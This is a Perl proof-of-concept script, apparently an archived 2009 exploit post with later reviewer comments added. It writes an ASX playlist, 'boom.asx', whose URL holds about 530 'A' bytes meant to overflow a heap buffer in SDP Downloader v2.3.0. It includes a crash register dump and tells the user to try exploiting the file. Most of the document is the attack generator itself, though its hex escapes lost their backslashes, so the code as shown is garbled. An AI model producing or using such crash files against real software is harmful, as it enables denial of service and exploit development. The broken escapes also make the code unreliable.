
# Title : SDP Downloader v2.3.0 (.ASX File) Local Heap Overflow PoC
# Published : 2009-04-24
# Author : Cyber-Zone


#!/usr/bin/perl
#
#
# Found By : Cyber-Zone (ABDELKHALEK) <== Proud To Be Figuigian ::Figuig City OwnZ !
#
# MoroCCo 2009
#
# GreatZ To : Hussin X , Jiko , ZoRLu , Mag!c ompo , Stack , b0rizQ ... All MoroCCaN HaCkerS
#
#OllyDBG registers, presumably captured at the crash (EAX holds 0x41414141, i.e. four bytes of the 'A' filler)
#EAX 41414141
#ECX 00AF74AC ASCII "http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#EDX 00502F58 SDP.00502F58
#EBX 00000041
#ESP 0012F798
#EBP 0012FAA4
#ESI 0000021D
#EDI 0012FA7C
#EIP 004208C2 SDP.004208C2
#
# Both positional arguments are required; with fewer than two, show the
# usage text and stop before anything is written to disk.
unless (@ARGV >= 2) {
    help();
    exit();
}
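# Print the two-line usage text to STDOUT.
# Takes no arguments (empty prototype); the return value is that of the
# last print.
# Each line now ends in a real newline: the archived text had a bare "n"
# where the "\n" escape belongs, so both lines ran together on output.
sub help()
{
    print "[X] Usage : perl $0 HackerName IP :d \n";
    print "[X] Exemple : perl $0 Cyber-Zone 127.0.0.1 \n";
}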
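# Both command-line values are cosmetic: they are echoed in the banner below
# and never reach the generated file. Declared lexically, since nothing else
# in the script reads them.
my ($HackerName, $IP) = @ARGV;

# The archived text had a bare "n" where each "\n" escape belongs; the
# newlines are restored here so the banner prints one message per line.
print "Please Wait ....................................\n";
sleep(5);    # purely cosmetic delay; no work happens while waiting
print "SDP Downloader v2.3.0 .ASX File Local Heap Overflow PoC\n\n";

# NOTE(review): this message is printed before the file is opened, so it
# appears even if the write further down fails.
print "Ok $HackerName , Your Evil ASX file Has Been Created !!!\n";
print "Your IP Is : $IP , Now Open The EviL File whith Our Targer Program And see if you Can Exploit'it\n";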

# Name of the playlist file the script writes, relative to the current
# working directory.
my $EviLFILE="boom.asx";

# Leading fragment of the playlist.
# NOTE(review): every "xNN" group in this block looks like a "\xNN" hex
# escape whose backslash was lost when the page was archived; as the text
# stands, these are literal characters. Read as hex escapes, this fragment
# spells the opening ASX element with VERSION="3.0", two newlines, an ENTRY
# element with a TITLE of "exploit", a newline, and the start of a REF element
# up to and including HREF=" -- it stops inside the attribute value.
my $Header1= "x3Cx41x53x58x20x56x45x52x53x49x4Fx4Ex3Dx22x33".
            "x2Ex30x22x3Ex0Ax0Ax3Cx45x4Ex54x52x59x3Ex3Cx54".
            "x49x54x4Cx45x3Ex65x78x70x6Cx6Fx69x74x3Cx2Fx54".
            "x49x54x4Cx45x3Ex0Ax3Cx52x45x46x20x48x52x45x46".
            "x3Dx22";
                        

# The HREF value: "http://" followed by the filler the author counts as 530
# units (see the trailing comment). 0x41 is ASCII 'A', which matches the
# 41414141 in EAX and the "http://AAAA..." string in ECX in the register dump
# at the top of the file. The overlong URL is the only malformed field;
# presumably the target copies it into a fixed-size heap buffer without a
# length check -- confirm against the vendor's fix.
# For triage: a playlist REF whose HREF runs to several hundred bytes of one
# repeated character is a simple indicator of this kind of test file.
my $ProofOfConcept ="http://".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41"; #530

# Trailing fragment. Read as hex escapes (same caveat as $Header1) it spells
# .asf" followed by the end of the REF element, a newline, and the closing
# ENTRY and ASX elements, which completes the HREF value and the document.
my $Header2= "x2Ex61x73x66x22x2Fx3Ex0Ax3Cx2Fx45x4Ex54x52x59".
            "x3Ex3Cx2Fx41x53x58x3E";
            
            
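# Write the three fragments back to back into $EviLFILE.
# Three-argument open with a lexical handle replaces the two-argument
# bareword form, so the file name is never parsed for a mode prefix.
# The original die text interpolated "$EviLFILEn" (an undefined variable,
# left over from a lost "\n" escape); it now names the file and reports $!.
open(my $boom_fh, '>', $EviLFILE) or die "ERROR ! :$EviLFILE: $!\n";
print {$boom_fh} $Header1 . $ProofOfConcept . $Header2
    or die "ERROR ! :$EviLFILE: $!\n";

# Buffered write errors only surface at close, so check it as well.
close($boom_fh) or die "ERROR ! :$EviLFILE: $!\n";

# Closing banner; the trailing newline escape is restored here too.
print ("Figuigian Hacker !!!\n");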
